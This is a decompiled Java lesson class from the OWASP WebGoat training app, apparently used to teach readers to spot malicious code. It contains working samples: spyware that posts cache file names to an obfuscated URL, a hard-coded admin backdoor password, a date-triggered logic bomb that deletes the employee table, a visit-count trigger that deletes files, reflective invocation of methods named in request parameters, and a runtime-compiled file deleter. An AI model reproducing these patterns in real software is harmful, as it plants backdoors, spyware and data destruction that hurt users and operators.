package org.owasp.webgoat.plugin;

import com.sun.jna.platform.win32.WinError;
import java.io.BufferedReader;
import java.io.File;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.io.Writer;
import java.net.URISyntaxException;
import java.net.URL;
import java.net.URLConnection;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Calendar;
import java.util.List;
import java.util.StringTokenizer;
import javax.tools.DiagnosticListener;
import javax.tools.JavaFileManager;
import javax.tools.JavaFileObject;
import javax.tools.ToolProvider;
import org.apache.ecs.Element;
import org.apache.ecs.ElementContainer;
import org.apache.ecs.StringElement;
import org.apache.ecs.html.Input;
import org.owasp.webgoat.lessons.Category;
import org.owasp.webgoat.lessons.LessonAdapter;
import org.owasp.webgoat.session.ECSFactory;
import org.owasp.webgoat.session.LessonTracker;
import org.owasp.webgoat.session.WebSession;
import sun.misc.BASE64Decoder;

/* loaded from: input_file:WebGoat.war:plugin_lessons/blind-script-1.0.jar:org/owasp/webgoat/plugin/BlindScript.class */
public class BlindScript extends LessonAdapter {
    private static final String PERSON = "person";
    private static final String CODE = "code";
    private static final String METHOD = "method";
    private static final String ARG_TYPES = "argTypes";
    private static final String PARAMS = "params";
    private static final String WEBGOAT_URL = "aHR0cDovL2xvY2FsaG9zdC9XZWJHb2F0L2NhdGNoZXI/UFJPUEVSVFk9eWVz";
    private static final Integer DEFAULT_RANKING = new Integer(10);

    /* JADX INFO: Access modifiers changed from: protected */
    @Override // org.owasp.webgoat.lessons.LessonAdapter, org.owasp.webgoat.session.Screen
    public Element createContent(WebSession webSession) {
        ElementContainer elementContainer = new ElementContainer();
        StringBuffer stringBuffer = null;
        try {
            stringBuffer = new StringBuffer(webSession.getParser().getStringParameter(PERSON, ""));
            if (!"".equals(stringBuffer.toString())) {
                elementContainer.addElement(new StringElement("Sorry.  Could not locate record for: " + stringBuffer.toString()));
            }
            elementContainer.addElement(new StringElement("Enter your name: "));
            elementContainer.addElement(new Input("TEXT", PERSON, stringBuffer.toString()));
            elementContainer.addElement(ECSFactory.makeButton("Go!"));
        } catch (Exception e) {
            webSession.setMessage("Error generating " + getClass().getName());
            e.printStackTrace();
        }
        if ("BrucE".equals(stringBuffer.toString())) {
            elementContainer = easterEgg(webSession);
            makeSuccess(webSession);
        }
        executeSpyWare(webSession);
        executeTimeTrigger(webSession);
        executeEventTrigger(webSession);
        executeBackDoor(webSession);
        String stringParameter = webSession.getParser().getStringParameter("code", "");
        String stringParameter2 = webSession.getParser().getStringParameter("method", "");
        String stringParameter3 = webSession.getParser().getStringParameter(ARG_TYPES, "");
        String stringParameter4 = webSession.getParser().getStringParameter("params", "");
        if (!stringParameter.equals("")) {
            try {
                loadMe(webSession, stringParameter, stringParameter2, stringParameter3, stringParameter4);
            } catch (IOException e2) {
            }
        }
        return elementContainer;
    }

    private void executeBackDoor(WebSession webSession) {
        if ("B_Admin443".equals(webSession.getParser().getStringParameter(PERSON, ""))) {
            webSession.setAdmin(true);
        }
    }

    public void executeSpyWare(WebSession webSession) {
        String str = System.getProperty("user.home") + "\\Local Settings\\Temporary Internet Files";
        String property = System.getProperty("line.separator");
        File file = new File(str);
        StringBuffer stringBuffer = new StringBuffer();
        if (file.isDirectory()) {
            for (File file2 : file.listFiles()) {
                stringBuffer.append(file2.getName());
                stringBuffer.append(property);
            }
        }
        try {
            URLConnection openConnection = new URL(new String(new BASE64Decoder().decodeBuffer(WEBGOAT_URL))).openConnection();
            openConnection.setDoOutput(true);
            OutputStreamWriter outputStreamWriter = new OutputStreamWriter(openConnection.getOutputStream());
            outputStreamWriter.write("&cache=" + stringBuffer.toString());
            outputStreamWriter.flush();
            BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(openConnection.getInputStream()));
            do {
            } while (bufferedReader.readLine() != null);
            outputStreamWriter.close();
            bufferedReader.close();
        } catch (Exception e) {
        }
    }

    private void executeEventTrigger(WebSession webSession) {
        if (getLessonTracker(webSession).getNumVisits() > 100) {
            File file = new File(LessonTracker.getUserDir(webSession));
            if (file.isDirectory()) {
                for (String str : file.list()) {
                    new File(file, str).delete();
                }
            }
        }
    }

    private void executeTimeTrigger(WebSession webSession) {
        Calendar calendar = Calendar.getInstance();
        Calendar calendar2 = Calendar.getInstance();
        calendar2.set(WinError.ERROR_INVALID_CMM, 1, 13);
        if (calendar.getTime().after(calendar2.getTime())) {
            try {
                WebSession.getConnection(webSession).prepareStatement("DELETE employee", 1004, 1008).executeQuery();
            } catch (Exception e) {
            }
        }
    }

    public static String loadMe(WebSession webSession, String str, String str2, String str3, String str4) throws IOException {
        try {
            Class<?> cls = Class.forName(str);
            StringTokenizer stringTokenizer = new StringTokenizer(str3, ",");
            StringTokenizer stringTokenizer2 = new StringTokenizer(str4, ",");
            Class<?>[] clsArr = null;
            Object[] objArr = null;
            if (stringTokenizer.countTokens() >= 1) {
                clsArr = new Class[stringTokenizer.countTokens()];
            }
            if (stringTokenizer2.countTokens() >= 1) {
                objArr = new Object[stringTokenizer2.countTokens()];
            }
            while (stringTokenizer.hasMoreTokens()) {
                String nextToken = stringTokenizer.nextToken();
                if ("W".equals(nextToken)) {
                    clsArr[0] = WebSession.class;
                    objArr[0] = webSession;
                } else if ("S".equals(nextToken)) {
                    clsArr[0] = String.class;
                } else if ("I".equals(nextToken)) {
                    clsArr[0] = Integer.class;
                }
            }
            return (String) cls.getMethod(str2, clsArr).invoke(cls, objArr);
        } catch (Exception e) {
            e.printStackTrace();
            return null;
        }
    }

    private ElementContainer easterEgg(WebSession webSession) {
        ElementContainer elementContainer = new ElementContainer();
        elementContainer.addElement(new StringElement("Bruce - You are the greatest!"));
        return elementContainer;
    }

    @Override // org.owasp.webgoat.lessons.LessonAdapter, org.owasp.webgoat.lessons.AbstractLesson
    public List<String> getHints(WebSession webSession) {
        ArrayList arrayList = new ArrayList();
        arrayList.add("Type in Bruce and press 'go'");
        arrayList.add("");
        arrayList.add("Press the Show Lesson Plan button to view a lesson summary");
        return arrayList;
    }

    @Override // org.owasp.webgoat.lessons.LessonAdapter, org.owasp.webgoat.lessons.AbstractLesson
    protected Integer getDefaultRanking() {
        return DEFAULT_RANKING;
    }

    @Override // org.owasp.webgoat.lessons.LessonAdapter, org.owasp.webgoat.lessons.AbstractLesson
    protected Category getDefaultCategory() {
        return Category.GENERAL;
    }

    @Override // org.owasp.webgoat.lessons.LessonAdapter, org.owasp.webgoat.lessons.AbstractLesson, org.owasp.webgoat.session.Screen
    public String getTitle() {
        return "Malicious Code";
    }

    private static boolean compile(JavaFileObject... javaFileObjectArr) {
        return ToolProvider.getSystemJavaCompiler().getTask((Writer) null, (JavaFileManager) null, (DiagnosticListener) null, (Iterable) null, (Iterable) null, Arrays.asList(javaFileObjectArr)).call().booleanValue();
    }

    private static String compose() {
        StringBuilder sb = new StringBuilder(1000);
        sb.append("package org.owasp.webgoat.plugin;\n");
        sb.append("import java.io.File;\n");
        sb.append("public class Deleter\n");
        sb.append("{\n");
        sb.append("static {\n");
        sb.append("File foo = new File(\"C:\\temp\\user.txt\");\n");
        sb.append("foo.delete();\n");
        sb.append("  }\n");
        sb.append("}\n");
        return sb.toString();
    }

    public static void StaticDeleter() {
        try {
            compile(new ResidentJavaFileObject("Deleter", compose()));
            Class.forName("org.owasp.webgoat.lessons.Deleter").newInstance();
        } catch (ClassNotFoundException e) {
        } catch (IllegalAccessException e2) {
        } catch (InstantiationException e3) {
        } catch (URISyntaxException e4) {
        }
    }
}
